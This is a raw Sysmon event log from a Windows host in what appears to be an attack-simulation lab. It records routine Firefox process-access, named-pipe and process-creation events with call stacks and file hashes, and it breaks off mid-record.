10:51:25.729{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AD-6216-1905-000000003802}4760C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288016Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.729{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AD-6216-1905-000000003802}4760C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x8000000000000000288015Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-ConnectPipe2022-02-23 10:51:25.698{C8EA50B7-11AA-6216-1605-000000003802}2228\cubeb-pipe-2228-1C:\Program Files\Mozilla Firefox\firefox.exe 17141700x8000000000000000288014Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-CreatePipe2022-02-23 10:51:25.698{C8EA50B7-11AA-6216-1605-000000003802}2228\cubeb-pipe-2228-1C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000288013Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.661{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-11AD-6216-1905-000000003802}4760C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288012Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.661{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-11AD-6216-1905-000000003802}4760C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000288011Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.661{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BBFC44062F4E6CE37CD1ECF3F4800C69,SHA256=EA320566444A9378BA26721FABEF0690203291A5184ABD4D15CA87FC74CF22D3,IMPHASH=00000000000000000000000000000000falsetrue 18141800x8000000000000000288010Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-ConnectPipe2022-02-23 10:51:25.661{C8EA50B7-11AC-6216-1705-000000003802}5396\chrome.2228.4.167450182C:\Program Files\Mozilla Firefox\firefox.exe 17141700x8000000000000000288009Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-CreatePipe2022-02-23 10:51:25.661{C8EA50B7-11AA-6216-1605-000000003802}2228\chrome.2228.4.167450182C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000288008Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.661{C8EA50B7-F11F-6215-1200-000000003802}81740C:\Windows\system32\svchost.exe{C8EA50B7-11AD-6216-1805-000000003802}5296C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cd4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288007Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.661{C8EA50B7-11AA-6216-1605-000000003802}22285412C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11AD-6216-1905-000000003802}4760C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+19e61d8|C:\Program Files\Mozilla Firefox\xul.dll+19e4a5b|C:\Program Files\Mozilla Firefox\xul.dll+12ac5|C:\Program Files\Mozilla Firefox\xul.dll+9850af|C:\Program Files\Mozilla Firefox\xul.dll+126a7|C:\Program Files\Mozilla Firefox\xul.dll+9822f1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1ddf8|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x8000000000000000288006Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-ConnectPipe2022-02-23 10:51:25.661{C8EA50B7-11AA-6216-1605-000000003802}2228\chrome.2228.3.186295593C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000288005Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.645{C8EA50B7-11AA-6216-1605-000000003802}22282412C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11AD-6216-1905-000000003802}4760C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+12204b|C:\Program Files\Mozilla Firefox\xul.dll+1205b3f|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1ddf8|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x8000000000000000288004Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-ConnectPipe2022-02-23 10:51:25.645{C8EA50B7-11AA-6216-1605-000000003802}2228\gecko-crash-server-pipe.2228C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000288003Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.629{C8EA50B7-11AA-6216-1605-000000003802}22286132C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11AC-6216-1705-000000003802}5396C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+eb71a2|C:\Program Files\Mozilla Firefox\xul.dll+b937e2|C:\Program Files\Mozilla Firefox\xul.dll+270212|C:\Program Files\Mozilla Firefox\xul.dll+26ffea|C:\Program Files\Mozilla Firefox\xul.dll+ecf9af|C:\Program Files\Mozilla Firefox\xul.dll+1b32ca7|C:\Program Files\Mozilla Firefox\xul.dll+1b3413d|C:\Program Files\Mozilla Firefox\xul.dll+1b3413d|C:\Program Files\Mozilla Firefox\xul.dll+1b36276|C:\Program Files\Mozilla Firefox\xul.dll+1788539|C:\Program Files\Mozilla Firefox\xul.dll+f03766|C:\Program Files\Mozilla Firefox\xul.dll+1b2ffc7|C:\Program Files\Mozilla Firefox\xul.dll+1788d0f|C:\Program Files\Mozilla Firefox\xul.dll+1787a03|C:\Program Files\Mozilla Firefox\xul.dll+f68dc|C:\Program Files\Mozilla Firefox\xul.dll+1142df|C:\Program Files\Mozilla Firefox\xul.dll+117160e|C:\Program Files\Mozilla Firefox\xul.dll+891fb8|C:\Program Files\Mozilla Firefox\xul.dll+8926e6|C:\Program Files\Mozilla Firefox\xul.dll+218e5a|C:\Program Files\Mozilla Firefox\xul.dll+c02645|C:\Program Files\Mozilla Firefox\xul.dll+81ae61 10341000x8000000000000000288002Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.614{C8EA50B7-11AA-6216-1605-000000003802}22286132C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11AD-6216-1905-000000003802}4760C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+2bd60|C:\Program Files\Mozilla Firefox\xul.dll+e38a9d|C:\Program Files\Mozilla Firefox\xul.dll+e32cb9|C:\Program Files\Mozilla Firefox\xul.dll+e23ae1|C:\Program Files\Mozilla Firefox\xul.dll+e22d2c|C:\Program Files\Mozilla Firefox\xul.dll+e2526d|C:\Program Files\Mozilla Firefox\xul.dll+c3009f|C:\Program Files\Mozilla Firefox\xul.dll+c2d435|C:\Program Files\Mozilla Firefox\xul.dll+278c1b|C:\Program Files\Mozilla Firefox\xul.dll+2787f1|C:\Program Files\Mozilla Firefox\xul.dll+f7a1af|C:\Program Files\Mozilla Firefox\xul.dll+17895e7|C:\Program Files\Mozilla Firefox\xul.dll+1787a03|C:\Program Files\Mozilla Firefox\xul.dll+c2f818|C:\Program Files\Mozilla Firefox\xul.dll+256a0e|C:\Program Files\Mozilla Firefox\xul.dll+2241bb|C:\Program Files\Mozilla Firefox\xul.dll+81ae61|C:\Program Files\Mozilla Firefox\xul.dll+175c39c|C:\Program Files\Mozilla Firefox\xul.dll+185df43|C:\Program Files\Mozilla Firefox\xul.dll+1aaf36b|C:\Program Files\Mozilla Firefox\xul.dll+1713cd7|C:\Program Files\Mozilla Firefox\xul.dll+1bde499 10341000x8000000000000000288001Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.614{C8EA50B7-11AA-6216-1605-000000003802}22285412C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11AD-6216-1905-000000003802}4760C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+99a30f|C:\Program Files\Mozilla Firefox\xul.dll+7c6644|C:\Program Files\Mozilla Firefox\xul.dll+19e466f|C:\Program Files\Mozilla Firefox\xul.dll+12ac5|C:\Program Files\Mozilla Firefox\xul.dll+9850af|C:\Program Files\Mozilla Firefox\xul.dll+126a7|C:\Program Files\Mozilla Firefox\xul.dll+9822f1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1ddf8|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288000Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.598{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287999Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.598{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287998Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.598{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287997Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.598{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287996Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.598{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-11AD-6216-1905-000000003802}4760C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287995Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.598{C8EA50B7-11AA-6216-1605-000000003802}22282268C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11AD-6216-1905-000000003802}4760C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+189bf|C:\Program Files\Mozilla Firefox\firefox.exe+30cfd|C:\Program Files\Mozilla Firefox\firefox.exe+2ff25|C:\Program Files\Mozilla Firefox\xul.dll+2052e4a|C:\Program Files\Mozilla Firefox\xul.dll+9962fe|C:\Program Files\Mozilla Firefox\xul.dll+9944b5|C:\Program Files\Mozilla Firefox\xul.dll+99b13e|C:\Program Files\Mozilla Firefox\xul.dll+83253d|C:\Program Files\Mozilla Firefox\xul.dll+168dd89|C:\Program Files\Mozilla Firefox\xul.dll+168c88a|C:\Program Files\Mozilla Firefox\xul.dll+9850af|C:\Program Files\Mozilla Firefox\xul.dll+249ae|C:\Program Files\Mozilla Firefox\xul.dll+8357fb|C:\Program Files\Mozilla Firefox\nss3.dll+68dc|C:\Program Files\Mozilla Firefox\nss3.dll+90731|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1ddf8|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000287994Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.608{C8EA50B7-11AD-6216-1905-000000003802}4760C:\Program Files\Mozilla Firefox\firefox.exe97.0.1FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2228.3.1862955931\1168923783" -childID 2 -isForBrowser -prefsHandle 3388 -prefMapHandle 3384 -prefsLen 5125 -prefMapSize 251484 -jsInitHandle 976 -jsInitLen 279340 -parentBuildID 20220216172458 -appDir "C:\Program Files\Mozilla Firefox\browser" - 2228 "\\.\pipe\gecko-crash-server-pipe.2228" 3412 157d5325148 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32LowMD5=47024075D8FB7B85F0B6615FFB0E87A5,SHA256=FE842C526ABBEE926C9CFE27F45AE3BC20F5614878120A9150B1A2DDA1CD226D,IMPHASH=FAFFE564A2DAFFCCC4A6BE71D34C1748{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 10341000x8000000000000000287993Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.598{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287992Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.598{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287991Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.598{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287990Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.598{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287989Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.598{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287988Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.598{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla 